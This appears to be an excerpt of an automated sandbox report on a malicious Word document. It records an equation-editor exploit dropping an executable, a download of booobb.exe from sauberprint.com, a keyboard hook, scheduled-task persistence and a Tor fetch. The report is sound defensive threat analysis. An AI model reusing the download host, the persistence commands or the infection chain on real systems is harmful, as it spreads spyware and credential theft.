                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmpString found in binary or memory: http://www.comsign.co.il/cps0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515921788.00000000060CE000.00000004.00000001.sdmpString found in binary or memory: http://www.crc.bg0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.668190347.0000000006030000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.668190347.0000000006030000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515994593.0000000006113000.00000004.00000001.sdmpString found in binary or memory: http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515921788.00000000060CE000.00000004.00000001.sdmpString found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515921788.00000000060CE000.00000004.00000001.sdmpString found in binary or memory: http://www.disig.sk/ca0f
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.516031777.00000000060BD000.00000004.00000001.sdmpString found in binary or memory: http://www.dnie.es/dpc0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515921788.00000000060CE000.00000004.00000001.sdmpString found in binary or memory: http://www.e-certchile.cl/html/productos/download/CPSv1.7.pdf01
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmpString found in binary or memory: http://www.e-me.lv/repository0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crl
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/SZSZ/0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmpString found in binary or memory: http://www.e-trust.be/CPS/QNcerts
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515981287.0000000008852000.00000004.00000001.sdmpString found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.516126248.00000000060DD000.00000004.00000001.sdmpString found in binary or memory: http://www.entrust.net/CRL/net1.crl0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.620886421.00000000060B4000.00000004.00000001.sdmpString found in binary or memory: http://www.firmaprofesional.com0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.620792567.000000000881D000.00000004.00000001.sdmpString found in binary or memory: http://www.globaltrust.info0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515965439.0000000008848000.00000004.00000001.sdmpString found in binary or memory: http://www.globaltrust.info0=
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.516081669.0000000008844000.00000004.00000001.sdmpString found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515921788.00000000060CE000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515965439.0000000008848000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.gva.es/cps0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515965439.0000000008848000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.gva.es/cps0%
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515898451.00000000060F0000.00000004.00000001.sdmpString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.516081669.0000000008844000.00000004.00000001.sdmpString found in binary or memory: http://www.post.trust.ie/reposit/cps.html0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.516108866.000000000885C000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadis.bm0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.516108866.000000000885C000.00000004.00000001.sdmpString found in binary or memory: http://www.registradores.org/scr/normativa/cp_f2.htm0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.516031777.00000000060BD000.00000004.00000001.sdmpString found in binary or memory: http://www.rootca.or.kr/rca/cps.html0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515981287.0000000008852000.00000004.00000001.sdmpString found in binary or memory: http://www.signatur.rtr.at/current.crl0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515981287.0000000008852000.00000004.00000001.sdmpString found in binary or memory: http://www.signatur.rtr.at/de/directory/cps.html0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515981287.0000000008852000.00000004.00000001.sdmpString found in binary or memory: http://www.sk.ee/cps/0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515981287.0000000008852000.00000004.00000001.sdmpString found in binary or memory: http://www.sk.ee/juur/crl/0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515965439.0000000008848000.00000004.00000001.sdmpString found in binary or memory: http://www.ssc.lt/cps03
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.516069331.000000000884C000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515981287.0000000008852000.00000004.00000001.sdmpString found in binary or memory: http://www.trustdst.com/certificates/policy/ACES-index.html0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515898451.00000000060F0000.00000004.00000001.sdmpString found in binary or memory: http://www.valicert.com/1
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.666161805.000000000280A000.00000004.00000001.sdmp, edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.666273710.0000000002869000.00000004.00000001.sdmpString found in binary or memory: https://OT3VeV4yt7mB0FaAlTS.org
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515898451.00000000060F0000.00000004.00000001.sdmpString found in binary or memory: https://ca.sia.it/seccli/repository/CPS0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515994593.0000000006113000.00000004.00000001.sdmpString found in binary or memory: https://ca.sia.it/secsrv/repository/CPS0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.516108866.000000000885C000.00000004.00000001.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmpString found in binary or memory: https://rca.e-szigno.hu/ocsp0-
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.665038465.00000000024F0000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515981287.0000000008852000.00000004.00000001.sdmpString found in binary or memory: https://secure.a-cert.at/cgi-bin/a-cert-advanced.cgi0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.668190347.0000000006030000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515981287.0000000008852000.00000004.00000001.sdmpString found in binary or memory: https://www.catcert.net/verarrel
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515981287.0000000008852000.00000004.00000001.sdmpString found in binary or memory: https://www.catcert.net/verarrel05
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.516069331.000000000884C000.00000004.00000001.sdmpString found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.516069331.000000000884C000.00000004.00000001.sdmpString found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.516031777.00000000060BD000.00000004.00000001.sdmpString found in binary or memory: https://www.netlock.hu/docs/
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515795061.000000000611A000.00000004.00000001.sdmpString found in binary or memory: https://www.netlock.net/docs
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000004.00000002.414520303.000000000372F000.00000004.00000001.sdmp, edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.663533545.0000000000402000.00000040.00000001.sdmp, newapp.exe, 00000008.00000002.483735795.00000000035BF000.00000004.00000001.sdmp, newapp.exe, 0000000B.00000002.505958916.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.664596383.0000000002431000.00000004.00000001.sdmp, newapp.exe, 0000000B.00000002.506916531.0000000002261000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8B643B49-3C8D-42A4-9902-607278FF94D5}.tmpJump to behavior
                      Source: unknownDNS traffic detected: queries for: sauberprint.com
                      Source: global trafficHTTP traffic detected: GET /lupin/booobb.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sauberprint.comConnection: Keep-Alive

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Installs a global keyboard hookShow sources
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeWindow created: window name: CLIPBRDWNDCLASS
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWindow created: window name: CLIPBRDWNDCLASS

                      System Summary:

                      barindex
                      Office equation editor drops PE fileShow sources
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\booobb[1].exeJump to dropped file
                      .NET source code contains very large array initializationsShow sources
                      Source: 7.2.edufyrigefy4utwgqeoriufj4ce.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b2F86C81Eu002d9255u002d4FC5u002dA8A7u002d333F43D4D423u007d/u0036ABE793Fu002d8399u002d42DCu002dADDBu002d204C80BA7E0A.csLarge array initialization: .cctor: array initializer size 11951
                      Source: 11.2.newapp.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b2F86C81Eu002d9255u002d4FC5u002dA8A7u002d333F43D4D423u007d/u0036ABE793Fu002d8399u002d42DCu002dADDBu002d204C80BA7E0A.csLarge array initialization: .cctor: array initializer size 11951
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeCode function: 4_2_003201B4
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeCode function: 4_2_003279B8
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeCode function: 4_2_003279C8
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeCode function: 4_2_00322792
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeCode function: 4_2_00320790
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeCode function: 7_2_00226060
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeCode function: 7_2_00225448
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeCode function: 7_2_0022D710
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeCode function: 7_2_00225790
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeCode function: 7_2_0022DE70
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeCode function: 7_2_0022219F
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeCode function: 7_2_00F8BAC8
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeCode function: 7_2_00F83EB8
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeCode function: 7_2_00F85E88
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeCode function: 7_2_00F891B0
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeCode function: 7_2_00F80048
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeCode function: 7_2_00F84DB0
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeCode function: 7_2_00F8B588
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeCode function: 7_2_04A70048
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeCode function: 7_2_04A73348
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_001D01B4
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_001D79B8
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_001D79C8
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_001D0790
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_001D1792
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 11_2_00266060
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 11_2_00265448
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 11_2_0026219F
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 11_2_00265790
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 12_2_001A01B4
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 12_2_001A79B8
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 12_2_001A79C8
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 12_2_001A7AA8
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 12_2_001A1492
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 12_2_001A0790
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 17_2_00226060
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 17_2_00225448
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 17_2_00225790
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 17_2_0022219F
                      Source: edufyrigefy4utwgqeoriufj4ce.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: booobb[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: yxnDFepLbf.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: newapp.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeMemory allocated: 76F90000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeMemory allocated: 76E90000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeMemory allocated: 76F90000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeMemory allocated: 76E90000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 76F90000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 76E90000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 76F90000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 76E90000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 76F90000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 76E90000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 76F90000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 76E90000 page execute and read and write
                      Source: edufyrigefy4utwgqeoriufj4ce.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: booobb[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: yxnDFepLbf.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: newapp.exe.7.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ......................'.........E.R.R.O.R.:. ...................$.................................................-.......................'.....
                      Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ......................'.........E.R.R.O.(.P.....................$.......................................................X.................'.....
                      Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................................E.R.R.O.R.:. ...........................7.........................................".............................
                      Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................................E.R.R.O.(.P.............................=...............................................X.......................
                      Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ......................(.........E.R.R.O.R.:. ...................X.........................................................................(.....
                      Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ......................(.........E.R.R.O.(.P.....................X.......................................................X.................(.....
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yxnDFepLbf' /XML 'C:\Users\user\AppData\Local\Temp\tmp7B0A.tmp'
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess created: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe 'C:\Users\user\AppData\Roaming\newapp\newapp.exe'
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yxnDFepLbf' /XML 'C:\Users\user\AppData\Local\Temp\tmpEC63.tmp'
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe C:\Users\user\AppData\Roaming\newapp\newapp.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe 'C:\Users\user\AppData\Roaming\newapp\newapp.exe'
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yxnDFepLbf' /XML 'C:\Users\user\AppData\Local\Temp\tmp10D3.tmp'
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe C:\Users\user\AppData\Roaming\newapp\newapp.exe
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe C:\Users\user\AppData\Roaming\newapp\newapp.exe
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe C:\Users\user\AppData\Roaming\newapp\newapp.exe
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yxnDFepLbf' /XML 'C:\Users\user\AppData\Local\Temp\tmp7B0A.tmp'
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess created: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yxnDFepLbf' /XML 'C:\Users\user\AppData\Local\Temp\tmpEC63.tmp'
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe C:\Users\user\AppData\Roaming\newapp\newapp.exe
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yxnDFepLbf' /XML 'C:\Users\user\AppData\Local\Temp\tmp10D3.tmp'
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe C:\Users\user\AppData\Roaming\newapp\newapp.exe
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe C:\Users\user\AppData\Roaming\newapp\newapp.exe
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe C:\Users\user\AppData\Roaming\newapp\newapp.exe
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$ecification.docJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCA31.tmpJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@22/19@14/2
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
